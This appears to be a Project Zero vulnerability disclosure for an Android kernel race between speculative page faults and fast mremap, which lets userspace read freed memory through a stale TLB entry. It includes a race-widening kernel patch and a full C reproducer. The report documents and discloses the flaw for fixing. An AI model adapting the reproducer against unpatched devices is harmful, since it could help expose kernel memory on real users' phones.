## https://sploitus.com/exploit?id=PACKETSTORM:189615
The AOSP 5.10/5.15 kernels contain a non-upstream memory management optimization called "Speculative Page Fault" (SPF). There have been a series of issues in this code before; see https://project-zero.issues.chromium.org/42451518.
    
    One of the fixes that was made to Android's SPF code back then was https://android.googlesource.com/kernel/common/+/3e7526c6723968ce62ab2779256bed5cfc0340ec%5E%21/ ("ANDROID: disable page table moves when speculative page faults are enabled"), which disables the mremap() optimization that moves entire page tables at once for Android kernels. The commit message says:
    
        move_page_tables() can move entire pmd or pud without locking individual ptes. This is problematic for speculative page faults which do not take mmap_lock because they rely on ptl lock when writing new pte value. To avoid possible race, disable move_page_tables() optimization when CONFIG_SPECULATIVE_PAGE_FAULT is enabled.
    
    However, that mremap() optimization was brought back again a month later, in https://android.googlesource.com/kernel/common/+/af027c97fcf53bc7494a8c67b89c97381c1ea1ea%5E%21/ ("ANDROID: Make SPF aware of fast mremaps"). That commit message says:
    
        SPF attempts page faults without taking the mmap lock, but takes the PTL. If there is a concurrent fast mremap (at PMD/PUD level), this can lead to a UAF as fast mremap will only take the PTL locks at the PMD/PUD level. SPF cannot take the PTL locks at the larger subtree granularity since this introduces much contention in the page fault paths.
    
        To address the race:
    
            Fast mremaps wait until there are no users of the VMA.
            Speculative faults detect ongoing fast mremaps and fallback to conventional fault handling (taking mmap read lock).
    
        Since this race condition is very rare the performance impact is negligible.
    
    In its new form, the optimization relies on the per-VMA refcount introduced by SPF as a sort of lock to prevent concurrent mremap() and SPF handling on a VMA.
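
    To make this concrete, here is a small userspace model of that handshake as I read it from the commit message and from the trace further down. The names follow the trace (file_ref_count, trylock_vma_ref_count, unlock_vma_ref_count), but the exact counter values and the wait-versus-fallback behaviour of the real AOSP code may differ, so treat this purely as a sketch:

    #include <stdatomic.h>
    #include <stdbool.h>

    /* Simplified stand-in for the per-VMA refcount used by SPF. */
    struct vma_model {
      atomic_int file_ref_count;  /* >= 0: number of SPF users; < 0: fast mremap has claimed the VMA */
    };

    /* SPF side, modeled on atomic_inc_unless_negative(&vma->file_ref_count):
     * take a reference unless a fast mremap has already claimed the VMA. */
    static bool spf_get_vma(struct vma_model *vma) {
      int old = atomic_load(&vma->file_ref_count);
      while (old >= 0) {
        if (atomic_compare_exchange_weak(&vma->file_ref_count, &old, old + 1))
          return true;   /* reference taken; handle the fault speculatively */
      }
      return false;      /* fast mremap ongoing; fall back to taking mmap_lock */
    }

    static void spf_put_vma(struct vma_model *vma) {
      atomic_fetch_sub(&vma->file_ref_count, 1);
    }

    /* Fast-mremap side, modeled on trylock_vma_ref_count()/unlock_vma_ref_count():
     * only do the PMD/PUD-level move once no SPF holds a reference, and park the
     * counter at a negative value so that new SPFs fall back in the meantime. */
    static bool trylock_vma_ref_count(struct vma_model *vma) {
      int expected = 0;  /* assumption in this model: 0 means "no SPF user" */
      return atomic_compare_exchange_strong(&vma->file_ref_count, &expected, -1);
    }

    static void unlock_vma_ref_count(struct vma_model *vma) {
      atomic_store(&vma->file_ref_count, 0);
    }

    The property that matters for what follows is that this handshake is tied to one particular vm_area_struct object; it says nothing about other VMA objects that may later come to cover the same virtual addresses.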
    
    The issue with this approach is that merging and splitting VMAs does not synchronize with SPF or propagate information about pending SPFs. Even after locking a page table and rechecking the SPF seqcount, an SPF only holds a reference to a VMA that was at some point associated with the virtual address being accessed and that is roughly equivalent to the VMA currently covering the address; it does not necessarily hold a reference to the exact VMA object that currently covers the address. That refcount just keeps the right file object, anon_vma, and so on alive.
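
    As a minimal sketch of that gap (again a userspace model with invented names, not the AOSP code): splitting a VMA hands part of its range to a freshly allocated VMA object whose refcount has never been touched by any SPF that entered through the old object, so a fast-mremap trylock on the new object can succeed while such an SPF is still in flight.

    #include <stdatomic.h>
    #include <stdlib.h>

    struct vma_model {
      unsigned long vm_start, vm_end;
      atomic_int file_ref_count;   /* SPF references, as in the sketch above */
    };

    /* Split [vm_start, vm_end) at addr, mprotect-style: the lower part moves into
     * a freshly allocated VMA object. Nothing here consults or transfers the
     * refcount, so a reference held by an in-flight SPF on `old` does not make a
     * later trylock_vma_ref_count() on `new` fail. */
    static struct vma_model *split_vma_model(struct vma_model *old, unsigned long addr) {
      struct vma_model *new = calloc(1, sizeof(*new));
      if (!new)
        return NULL;
      new->vm_start = old->vm_start;
      new->vm_end = addr;
      atomic_init(&new->file_ref_count, 0);  /* fresh count: no record of pending SPFs */
      old->vm_start = addr;                  /* old object keeps only the upper part */
      return new;
    }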
    
    So the following race is possible:
    
    task A                        task B
    ======                        ======
    <CoW page fault at address A begins>
      get_vma
        find_vma_from_tree
        atomic_inc_unless_negative(&vma->file_ref_count)
      do_handle_mm_fault
        __handle_mm_fault
          handle_pte_fault
            do_wp_page
              wp_page_copy
                pte_map_lock
                *** execution delayed here ***
                                  mprotect() [on address B in same VMA as address A]
                                    do_mprotect_pkey
                                      mprotect_fixup
                                        split_vma
                                          [address A is split off into new VMA]
                                  mremap(<address A>, ..., <address C>)
                                    mremap_to
                                      move_vma
                                        copy_vma
                                        move_page_tables
                                          move_pgt_entry [NORMAL_PMD]
                                            move_normal_pmd
                                              trylock_vma_ref_count
                                                [works, no SPF running on this VMA]
                                              [take PMD locks]
                                              [move PMD entry]
                                              flush_tlb_range(<address A>)
                                              [drop PMD locks]
                                              unlock_vma_ref_count
                ptep_clear_flush_notify(vma, <address A>, ...)           ***A***
                ...
                set_pte_at_notify(mm, <address A>, ...);
                page_remove_rmap
                put_page             ***B***
                pte_unmap_unlock
    
    At ***A***, task A attempts to use ptep_clear_flush_notify() to flush stale TLB entries for the PTE that was just removed; but while task A thinks it is removing a PTE for virtual address A, it is actually removing one for virtual address C because move_normal_pmd() has moved the page table containing the PTE in the meantime. So the TLB flush is directed to the wrong address and has no effect.
    
    At ***B***, task A then drops the reference that was previously held by the page tables on the page. At this point, the page is freed, and if a stale TLB entry remains, it now allows userspace to read freed memory.
    
    The good news is that (at least as far as I can tell) stale TLB entries caused by this bug will always be read-only; so this is effectively a physical-memory use-after-free read, but not a physical-memory use-after-free write.
    reproducer
    
    I tested this on the android14-5.15 AOSP kernel branch (at commit f4552ca3639d6f3e7c83e58fb4388d6e8b006612).
    
    To make the issue easier to hit, I patched the kernel like this to artificially widen the race window:
    
    diff --git a/mm/memory.c b/mm/memory.c
    index 82a1783114a6..358db1219df8 100644
    --- a/mm/memory.c
    +++ b/mm/memory.c
    @@ -75,6 +75,7 @@
     #include <linux/perf_event.h>
     #include <linux/ptrace.h>
     #include <linux/vmalloc.h>
    +#include <linux/delay.h>
     #include <trace/hooks/mm.h>
    
     #include <trace/events/kmem.h>
    @@ -3249,6 +3250,14 @@ static vm_fault_t wp_page_copy(struct vm_fault *vmf)
                    entry = pte_sw_mkyoung(entry);
                    entry = maybe_mkwrite(pte_mkdirty(entry), vma);
    
    +               if (strcmp(current->comm, "SLOWME") == 0 && vmf->address == 0x201000) {
    +                       pr_warn("%s: begin slowdown on WP fault, speculative=%d, page_count(old_page)=%d\n",
    +                               __func__, !!(vmf->flags & FAULT_FLAG_SPECULATIVE), page_count(old_page));
    +                       mdelay(2000);
    +                       pr_warn("%s: end slowdown on WP fault, page_count(old_page)=%d\n",
    +                               __func__, page_count(old_page));
    +               }
    +
                    /*
                     * Clear the pte entry and flush it first, before updating the
                     * pte with the new entry, to keep TLBs on different CPUs in
    
    Then I built the kernel for X86 with my own kernel config, which includes CONFIG_PAGE_POISONING=y, and booted it with the page_poison=1 command line flag.
    
    Then I wrote this reproducer:
    
    #define _GNU_SOURCE
    #include <pthread.h>
    #include <err.h>
    #include <unistd.h>
    #include <assert.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <fcntl.h>
    #include <sys/mman.h>
    #include <sys/prctl.h>
    
    #define SYSCHK(x) ({          \
      typeof(x) __res = (x);      \
      if (__res == (typeof(x))-1) \
        err(1, "SYSCHK(" #x ")"); \
      __res;                      \
    })
    
    static void pin_task_to(int pid, int cpu) {
      cpu_set_t cset;
      CPU_ZERO(&cset);
      CPU_SET(cpu, &cset);
      SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
    }
    static void pin_to(int cpu) { pin_task_to(0, cpu); }
    
    // PMD size plus one more page
    #define MAP_LEN 0x201000
    
    // our kernel cheat expects the source mapping to be at 0x201000
    #define entry_off 0x1000LU
    
    static volatile unsigned long *p;
    
    static void *thread_fn(void *dummy) {
      pin_to(0);
      SYSCHK(prctl(PR_SET_NAME, "SLOWME"));
      // Trigger CoW fault; this will copy page contents into a new page and drop
      // the page tables' reference on the old page.
      // This is where the kernel cheat patch will inject a 2-second delay.
      // This is where the misdirected TLB flush is issued.
      *p = 2;
      SYSCHK(prctl(PR_SET_NAME, "SLOWME-post"));
      sleep(2);
      // Make sure we don't get stuck in an infinite loop on the main thread
      printf("looks like we failed somehow\n");
      exit(1);
      return NULL;
    }
    
    int main(void) {
      void *map = SYSCHK(mmap((void*)0x200000, MAP_LEN, PROT_READ|PROT_WRITE,
              MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED_NOREPLACE, -1, 0));
      void *dst_map = SYSCHK(mmap((void*)0x600000, MAP_LEN, PROT_NONE,
              MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED_NOREPLACE, -1, 0));
      p = (volatile unsigned long *)(map+entry_off);
      // create writable anon page at 0x200000, and write 1 into it
      *p = 1;
    
      // elevate page refcount
      int pipefds[2];
      SYSCHK(pipe(pipefds));
      struct iovec iov = { .iov_base = (void*)p, .iov_len = 0x1000 };
      SYSCHK(vmsplice(pipefds[1], &iov, 1, 0));
    
      // make the PTE RO
      SYSCHK(mprotect(map, MAP_LEN, PROT_READ));
      SYSCHK(mprotect(map, MAP_LEN, PROT_READ|PROT_WRITE));
    
      pthread_t thread;
      if (pthread_create(&thread, NULL, thread_fn, NULL))
        errx(1, "pthread_create");
    
      pin_to(1);
    
      // wait for thread to enter SPF
      sleep(1);
    
      // drop elevated page refcount
      close(pipefds[0]);
      close(pipefds[1]);
    
      SYSCHK(prctl(PR_SET_NAME, "TRACEME"));
    
      // split VMA at PMD boundary, such that 0x200000-0x400000 is now covered by a
      // new VMA.
      // the old VMA (which is referenced by the SPF) now only covers
      // 0x400000-0x401000.
      SYSCHK(mprotect(map+0x200000, 0x1000, PROT_READ));
    
      // move 0x200000-0x400000 to 0x600000-0x800000.
      // MREMAP_DONTUNMAP ensures that when the thread returns out of SPF handling
      // and restarts the memory access, it won't crash.
      SYSCHK(mremap(map, 0x200000, 0x200000, MREMAP_MAYMOVE|MREMAP_FIXED|MREMAP_DONTUNMAP, dst_map));
      SYSCHK(prctl(PR_SET_NAME, "TRACEME-post"));
    
      // Kinda magic: We keep reading from 0x601000 (the address to which we moved
      // the page that was at 0x201000, which we wrote 1 into) in a tight loop.
      // This has multiple important aspects:
      //
      // 1. Whenever the CPU core does not have a TLB entry at 0x601000, such a TLB
      //    entry is created by the memory read.
      // 2. Because we're in a tight loop, the TLB entry probably won't get evicted
      //    much (except when handling interrupts or such).
      // 3. As long as we have a TLB entry at 0x601000, we keep reading through it,
      //    even after it has become stale, until we see a value other than 1.
      unsigned long val;
      do { val = *(volatile unsigned long *)(dst_map+entry_off); } while (val == 1);
    
      printf("final value: 0x%lx\n", val);
    }
    
    and built and ran it like so:
    
    $ gcc -o spf-new-mremap-tlb-race spf-new-mremap-tlb-race.c -pthread -Wall -O2
    $ while true; do ./spf-new-mremap-tlb-race ; done
    looks like we failed somehow
    looks like we failed somehow
    final value: 0xaaaaaaaaaaaaaaaa
    final value: 0xaaaaaaaaaaaaaaaa
    looks like we failed somehow
    final value: 0xaaaaaaaaaaaaaaaa
    
    0xaa is the PAGE_POISON kernel constant that freed pages are filled with when CONFIG_PAGE_POISONING=y and page_poison=1 are enabled, demonstrating that userspace is reading the contents of pages that the kernel page allocator considers to be free.
    other issues in SPF
    
    While looking at this, I also noticed two other weird things:
    
        On LTS kernels before 6.1, kernel stack expansion happens under the mmap lock in read mode, so I think it won't trigger SPF seqcount bumps. I think this means that the pvma = *vma assignment in arch fault handler code can race with concurrent updates to the VMA start address, so theoretically there is no protection against a torn start address being stored in the copied VMA. However, it looks like it probably works out okay with the kernel's memcpy() implementation on arm64 (at least if the size and alignment of vm_area_struct stay the same).
        In __handle_mm_fault(), the call to pte_offset_map() looks racy: instead of calling pte_offset_map() like gup_pte_range() does (by passing in a pointer to an on-stack copy of the PMD value), it seems to pass in a pointer to the original PMD, which means the PMD can have a different value (and even a different type) from what the READ_ONCE() checks before and after it observe. In theory, this could probably cause a kernel crash, but you'd have to win two really tight races (at least on 64-bit) to trigger it. (See the sketch after this list for the pattern difference.)
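
    For the second point, here is a rough illustration of the pattern difference; the types, macros, and helpers below are stand-ins I made up for the sketch, not the actual kernel code, and the real pte_offset_map() does more than this:

    #include <stdint.h>

    typedef uint64_t pmd_t;                    /* stand-in for a PMD entry */
    #define MODEL_READ_ONCE(x) (*(volatile typeof(x) *)&(x))

    /* Stand-in for pte_offset_map(): derive a PTE pointer from a PMD value. */
    static uint64_t *pte_table(pmd_t value, unsigned long addr) {
      uint64_t *table = (uint64_t *)(uintptr_t)(value & ~0xfffULL);
      return table + ((addr >> 12) & 0x1ff);
    }

    /* gup_pte_range()-style: validate an on-stack snapshot of the PMD, then derive
     * the PTE pointer from that same snapshot, so check and use cannot diverge. */
    static uint64_t *snapshot_lookup(pmd_t *pmdp, unsigned long addr) {
      pmd_t snapshot = MODEL_READ_ONCE(*pmdp);
      if (snapshot == 0)                       /* "pmd_none()" in this model */
        return 0;
      return pte_table(snapshot, addr);
    }

    /* The pattern that looks racy: validate a snapshot, but then go back to the
     * live entry, which a concurrent thread may have changed (even to a different
     * kind of entry) between the check and the use. */
    static uint64_t *live_lookup(pmd_t *pmdp, unsigned long addr) {
      pmd_t snapshot = MODEL_READ_ONCE(*pmdp);
      if (snapshot == 0)
        return 0;
      return pte_table(MODEL_READ_ONCE(*pmdp), addr);  /* re-read, not the checked value */
    }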
    
    disclosure deadline
    
    This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2025-02-03.
    
    For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html
    
    Please credit me as "Jann Horn of Google Project Zero".
    
    Related CVE Number: CVE-2025-0088.